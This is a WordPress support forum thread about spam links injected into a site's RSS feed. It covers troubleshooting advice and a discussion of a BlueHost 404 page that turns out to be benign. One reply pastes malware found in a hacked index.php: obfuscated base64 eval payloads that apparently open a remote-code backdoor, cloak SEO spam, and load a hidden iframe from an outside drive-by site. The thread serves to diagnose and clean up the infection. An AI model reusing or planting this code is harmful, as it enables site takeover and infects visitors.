Link Spam in embedded RSS

  • Hi, can someone help?

    I have spent months building a site with wordpress, and have a high ranking on Google. Recently the outgoing RSS feed from my site has been not working, running it through a feed validation site I get the resulting error line

    This feed does not validate

    Line 176, column 15:XML parsing error: <unknown.:176:15: junk after document element

    …with a whole load of link spam showing up immediately after this highlighted line…

    <!– google –><font style=”position: absolute;overflow: hidden;height: 0;width: 0″>

    When I update wordpress the problem goes away and my RSS feed works, but only to return around 2 days later with the same problem…spam in my RSS feed and it not working. I installed the “bad behaviour” plugin immediately after updating but the problem comes back.

    What can I do, short of wiping my wordpress installation and starting again? I want to act fast as I don’t want my Google rankings effected.

    I have backups of exported XML files from my wordpress site.

    Thanks

Viewing 11 replies - 16 through 26 (of 26 total)
  • Thread Starter betelguese

    (@betelguese)

    Hmm…good points Gangleri and RVoodoo !

    This is a tricky one.

    I recently discovered I had anonymous ftp access allowed, this must be set to default on my web host as I’ve never touched it. That’s a definite security hole right there. I have now obviously blocked it.

    I will make doubly sure that it’s not a dodgy plugin doing it, and look at other possible sources on the server.

    Hi Betelguese,

    I have the same problem, and I coudnt find solution to it. Were you able to fix it?

    Thanks

    I am also having the same problem. Did you find a fix?

    I have the same problem as well. I am using wordpress 3.0.1

    Except this rss validation issue I don’t have any problems. where can this can be? How is this information called? If you give the address like, yoursite.com/rss, the rss.php script in the wp-includes is called. I’ve checked those files and they are clean. Where comes the rest?

    This is the result: https://feedvalidator.org/check.cgi?url=turkmac.com%2ffeed

    Moderator James Huff

    (@macmanx)

    Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Default theme (WordPress 1.5 – 2.9.2) or the Twenty Ten theme (WordPress 3.0 and higher) to rule-out a theme-specific issue (themes can affect feeds).

    Thank you for the quick answer. I already tried that. I switched themes, tried other ones including the standard one and disabled all plugins. RSS junk is there. It begins so:

    <!-- linksnkl --> <style>.zjg{position: absolute; overflow: auto; height: 0; width: 0;}</style><li class=zjg> <a href=https://quietcornerwildlife.com/

    Moderator James Huff

    (@macmanx)

    I that case, the junk could have been inserted into almost any of the core files. Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    I noticed the same thing when I tried to publish an RSS feed to Feedburner. Sure enough, I checked the validation and found this hidden code in my index.php file…

    /** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwppZigkX1JFUVVFU1RbJ2RmcXczMWYnXSkKZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsnZGZxdzMxZiddKSk7CiRocmVmID0gJ2h0dHA6Ly93d3cucHJvc29mdHdhcmVzdG9yZS5jb20vJzsKJHdvcmRzID0gYXJyYXkoJ1NvZnR3YXJlIFN0b3JlJywgJ01pY3Jvc29mdCBTb2Z0d2FyZScsICdBZG9iZSBTb2Z0d2FyZScsICdBdXRvZGVzayBTb2Z0d2FyZScsICdCb3JsYW5kIFNvZnR3YXJlIHNob3AnLCAnVk13YXJlIFNvZnR3YXJlJywgJ1Nob3AgU29mdHdhcmUnLCAnTUFDIFNvZnR3YXJlJywgJ1dpbmRvd3MgU29mdHdhcmUnLCAnU3ltYW50ZWMgc2hvcCcpOwoka2V5bnVtID0gY291bnQoJHdvcmRzKTsKJGFsdHMgPSAkd29yZHM7CgokciA9IHJhbmQoMCwgMyk7CiRyMiA9IHJhbmQoNCwgNyk7CiRyMyA9IHJhbmQoOCwgJGtleW51bS0xKTsKc2h1ZmZsZSgkYWx0cyk7CmZvcigkaT0wOyAkaTwka2V5bnVtOyAkaSsrKQp7CmlmKCRpPT0kciB8fCAkaT09JHIyIHx8ICRpPT0kcjMpCnsKJHI0ID0gcmFuZCgxLCAzKTsKJHN0ciA9IGltcGxvZGUoIiAiLCBhcnJheV9zbGljZSgkd29yZHMsIDAsIHJhbmQoMSwgaW50dmFsKCRrZXludW0vMikrMSkpKTsKJGFsdHNbJGldID0gIjxoND48YSBocmVmPVwiJGhyZWZcIiBhbHQ9XCIkc3RyXCIgdGl0bGU9XCIkc3RyXCI+U2hvcCAiLiRhbHRzWyRpXS4iPC9hPjwvaDQ+IjsKfQp9CmFycmF5X3B1c2goJGFsdHMsICI8YSBocmVmPVwiJGhyZWZcIj4kaHJlZjwvYT4iKTsKc2h1ZmZsZSgkYWx0cyk7CiRzdHIgPSBpbXBsb2RlKCIgIiwgJGFsdHMpOwppZihwcmVnX21hdGNoKCIvKGNyYXdsKXwoZ29vZ2xlKXwoeWFob28pfChiaW5nKXwoc3B5KXwoYm90KXwocGVybCl8KHB5dGhvbil8KGhvbG1lcyl8KGFsZXhhKXwoYi1vLXQpfChmaW5kbGlua3MpfChpY2hpcm8pfChsYXJiaW4pfChsaW5rKXwobHdwKXwoUHljVVJMKXwoc2NydWJieSl8KHNlYXJjaCl8KHN0YWNrKXwodXBkYXRlZCkvaSIsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpCmVjaG8oIjxkaXYgYWxpZ249Y2VudGVyPiRzdHI8L2Rpdj4iKTsKZWxzZQplY2hvKCI8Zm9udCBzdHlsZT1cInBvc2l0aW9uOi8qKi9hYnNvbHV0ZTtvdmVyZmxvdzovKiovaGlkZGVuOy8qKi93aWR0aDovKiovMFwiPiRzdHI8YSBocmVmPSckaHJlZic+JGhyZWY8L2E+PC9mb250PiIpOw==")); ?>
<?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>

    Not only that, I checked my server file modification dates and found at least one other file that had been hacked, the 404.shtml file which is a host file, not a WordPress file. It had the following code

    <!-- SHTML Wrapper - 404 Not Found -->
<!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    My webhost is BlueHost by the way.

    Ominously, I checked another entirely different account I have on BlueHost and it too had the same files hacked. These were also WordPress sites.

    So right now I’m not quite sure if it’s WordPress that has the problem, my Webhost, or a combination of both. But I find this deeply troubling.

    I’ve just discovered others talking about this…
    https://womm.leolincourt.com/fourohfourcgi-is-this-a-website-hack-attempt

    My 404.shtml file had been modified on 10/7/10 while my index.php file had been modified on 10/21/10.

    All my WordPress sites on BlueHost, on two different accounts have been hacked in the same way.

    This is a huge problem that needs more input from others.

    cnymike: The mentioned 404 page code does *not* appear to be a hack. Yes, the feed looks bad. See the above suggestions for that.

    As for the 404, I do not believe this to be a problem. The following code is the default code loaded into a brand-new generated BlueHost 404 page.

    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    As you can see, it is making a call to a directory called cgi-sys which is on a root level of the server and not accessible to view.

    My guess would be that BlueHost manages the default 404 page in that directory and that, when they made a change to their 404 page, they likely made a change to how their own default 404.shtml files were handled as well.

    You can test this by creating any random subdomain and then checking the files loaded in there by default. Your 404.shtml page will bear that code by default.

    Further research does confirm that the odd looking 404.shtml code is not a hack but a change in system generated 404. It was a coincidental but unrelated event.

    The hack on the index.html file on the other hand is indeed the result of nefarious activity and it’s not clear whether it was a plugin, theme or what that caused it. But there it is and the base64 code, once decoded, indicates links to two sites, one of which whose purpose is do a drive-by download to your computer.

    Nasty.

Viewing 11 replies - 16 through 26 (of 26 total)
  • The topic ‘Link Spam in embedded RSS’ is closed to new replies.